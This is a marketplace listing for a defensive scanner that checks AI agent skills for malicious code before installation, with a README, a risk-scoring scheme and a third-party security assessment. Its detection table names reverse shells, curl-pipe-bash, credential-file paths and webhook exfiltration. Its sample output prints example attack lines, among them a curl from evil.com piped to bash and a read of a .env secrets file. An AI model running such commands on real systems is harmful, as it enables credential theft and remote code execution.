← Back to Skills Marketplace
1696
Downloads
1
Stars
6
Active Installs
1
Versions
Install in OpenClaw
/install clawhub-skill-scanner
Description
Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation.
README (SKILL.md)
Skill Security Audit
MANDATORY security check before installing external skills.
Inspired by the ClawHavoc campaign that compromised 341 malicious skills on ClawHub.
When to Use
Run this audit BEFORE any skill installation:
clawhub install \x3Cskill>- Manual skill download/copy
- Skills from GitHub, URLs, or untrusted sources
Quick Start
# Scan a skill folder
python3 scripts/scan_skill.py /path/to/skill
# JSON output for automation
python3 scripts/scan_skill.py /path/to/skill --json
# Exit code 0 only if SAFE
python3 scripts/scan_skill.py /path/to/skill --install-if-safe
What It Detects
🔴 CRITICAL (Blocks Installation)
| Category | Patterns |
|---|---|
| Reverse Shells | nc -e, bash /dev/tcp, Python socket shells |
| Curl-Pipe-Bash | curl | bash, wget && chmod +x |
| Credential Access | ~/.ssh, ~/.aws, ~/.openclaw, .env files |
| Data Exfiltration | Discord/Slack webhooks, POST with secrets |
| Malicious Domains | glot.io, pastebin (known malware hosts) |
| Persistence | crontab, systemd, LaunchAgents, .bashrc |
| Command Injection | eval(), exec(), subprocess shell=True |
| Obfuscation | base64 decode pipes, pickle, marshal |
🟡 WARNING (Review Required)
Only patterns that are suspicious regardless of skill type:
- Raw socket usage (unusual for most skills)
- Dynamic code compilation
- File/directory deletion
- Screenshot/keyboard capture libraries
- Low-level system calls (ctypes)
Philosophy
We intentionally don't warn on common patterns like:
- HTTP requests (normal for API skills)
- API key references (normal for integration skills)
- File writes (normal for data skills)
- Environment variable access (normal for config)
This reduces noise so real threats stand out.
Risk Scoring
CRITICAL findings × 30 = Base score
WARNING findings × 3 (capped at 10) = Warning contribution
| Score | Level | Action |
|---|---|---|
| 0-20 | 🟢 SAFE | Auto-approve |
| 21-50 | 🟡 CAUTION | Review findings |
| 51-80 | 🔶 DANGER | Detailed review required |
| 81-100 | 🔴 BLOCKED | Do NOT install |
Sample Output
════════════════════════════════════════════════════════════
SKILL SECURITY AUDIT: suspicious-skill
════════════════════════════════════════════════════════════
📊 RISK SCORE: 90/100 - 🔴 BLOCKED
🔴 CRITICAL FINDINGS (3)
[install.py:15] Curl pipe to shell (DANGEROUS!)
Code: os.system('curl https://evil.com/x.sh | bash')
[setup.py:42] Discord webhook exfiltration
Code: requests.post('https://discord.com/api/webhooks/...')
[run.py:8] ClawdBot .env access (ClawHavoc target!)
Code: open(os.path.expanduser('~/.clawdbot/.env'))
📁 FILES SCANNED: 5
📏 TOTAL LINES: 230
════════════════════════════════════════════════════════════
🔴 BLOCK - Do NOT install this skill
════════════════════════════════════════════════════════════
Integration with clawhub
Create a wrapper script to auto-scan before installation:
#!/bin/bash
# clawhub-secure: Scan before install
SKILL="$2"
TEMP="/tmp/skill-audit-$$"
# Fetch without installing
clawhub inspect "$SKILL" --out "$TEMP"
# Scan
python3 /path/to/scan_skill.py "$TEMP" --install-if-safe
if [ $? -eq 0 ]; then
clawhub install "$SKILL"
else
echo "🔴 Installation blocked by security scan"
exit 1
fi
rm -rf "$TEMP"
References
See references/threat-patterns.md for detailed pattern explanations.
Credits
Developed in response to the ClawHavoc campaign (Feb 2026) that demonstrated large-scale supply chain attacks via AI agent skill marketplaces.
Usage Guidance
This skill appears to do what it says: a local pattern-based scanner you can run before installing skills. Before trusting it as your only defense: 1) Verify the scanner's source (owner and repo) and ensure you obtained the package from a trusted location — the provided metadata has no homepage and an unfamiliar owner ID. 2) Inspect scripts/scan_skill.py yourself (or in a sandbox/CI) to confirm the rule set matches your threat model and to tune whitelist/blacklist rules to avoid false positives/negatives. 3) Don't rely solely on this tool: pattern-based scanners can miss obfuscated or logic-based exfiltration and can also produce false positives; combine with manual review or runtime sandboxing for high-risk skills. 4) If you plan to integrate the wrapper into an automated install pipeline, ensure the wrapper's paths are correct and run the scanner from a controlled environment (CI or isolated host) so it cannot be tricked into scanning arbitrary system paths. If you want higher assurance, request a published repository URL or signed release for provenance — absence of a homepage/repo reduces confidence.
Capability Analysis
Type: OpenClaw Skill
Name: clawhub-skill-scanner
Version: 0.1.0
This skill bundle is a security scanner designed to detect malicious patterns in other OpenClaw skills. All files, including SKILL.md (agent instructions), scripts/scan_skill.py (core logic), and documentation, consistently describe and implement this benign functionality. The SKILL.md provides instructions on how to use the scanner to prevent malicious installations, without containing any prompt injection attempts or instructions for the agent to perform harmful actions. The Python script itself safely reads files and applies regex patterns to identify threats, without executing any detected patterns or performing unauthorized network/file system operations. There is no evidence of intentional harmful behavior or risky capabilities beyond its stated purpose as a security analysis tool.
Capability Assessment
Purpose & Capability
Name/description claim a pre-install security scanner and the package includes a Python scanner (scripts/scan_skill.py) plus documentation implementing that purpose. It does not request unrelated credentials, binaries, or configuration paths.
Instruction Scope
SKILL.md instructs the agent/user to run the included Python scanner against a skill folder and shows a wrapper that fetches a skill and scans it before install — this matches the stated purpose. Minor concerns: the doc repeatedly calls the scan 'MANDATORY' and lists triggers (e.g., 'install skill') but the skill metadata doesn't enforce mandatory execution; the wrapper script assumes clawhub inspect is available at runtime and the path to the scanner is correct. Also review the scanner's whitelist and pattern choices (e.g., some generic whitelist entries like '# ' and 'https://api.' may suppress matches in comments or API URLs).
Install Mechanism
No install spec/external downloads; code lives in the skill bundle. This minimizes supply-chain risk since nothing is fetched or executed by an automated install step in the skill itself.
Credentials
The skill requires no environment variables, credentials, or privileged config paths. The scanner looks for references to credentials in scanned code (e.g., ~/.ssh, ~/.aws, .env) which is appropriate for its purpose.
Persistence & Privilege
Skill is not marked always:true and does not request persistent privileges. The SKILL.md suggests a wrapper to run the scanner before installs, but the skill itself does not modify other skill configs or system-wide settings.
How to Use
- Make sure OpenClaw is installed (local or Docker)
- Run the install command in chat:
/install clawhub-skill-scanner - After installation, invoke the skill by name or use
/clawhub-skill-scanner - Provide required inputs per the skill's parameter spec and get structured output
Version History
v0.1.0
Initial release of clawhub-skill-scanner
- Introduces a mandatory security audit tool for skill installations from ClawHub, GitHub, and external sources.
- Deep code analysis detects critical risks including reverse shells, credential access, data exfiltration, command injection, and common malware patterns.
- Outputs clear risk scoring (SAFE/CAUTION/DANGER/BLOCKED) and actionable summaries.
- Designed to minimize false alarms by ignoring common benign patterns.
- Includes CLI examples and integration guide for automated pre-install scanning.
- Created in response to ClawHavoc supply chain compromise.
Metadata
Frequently Asked Questions
What is Clawhub Skill Scanner?
Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation. It is an AI Agent Skill for Claude Code / OpenClaw, with 1696 downloads so far.
How do I install Clawhub Skill Scanner?
Run "/install clawhub-skill-scanner" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.
Is Clawhub Skill Scanner free?
Yes, Clawhub Skill Scanner is completely free (open-source). You can download, install and use it at no cost.
Which platforms does Clawhub Skill Scanner support?
Clawhub Skill Scanner is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).
Who created Clawhub Skill Scanner?
It is built and maintained by amir-ag (@amir-ag); the current version is v0.1.0.
More Skills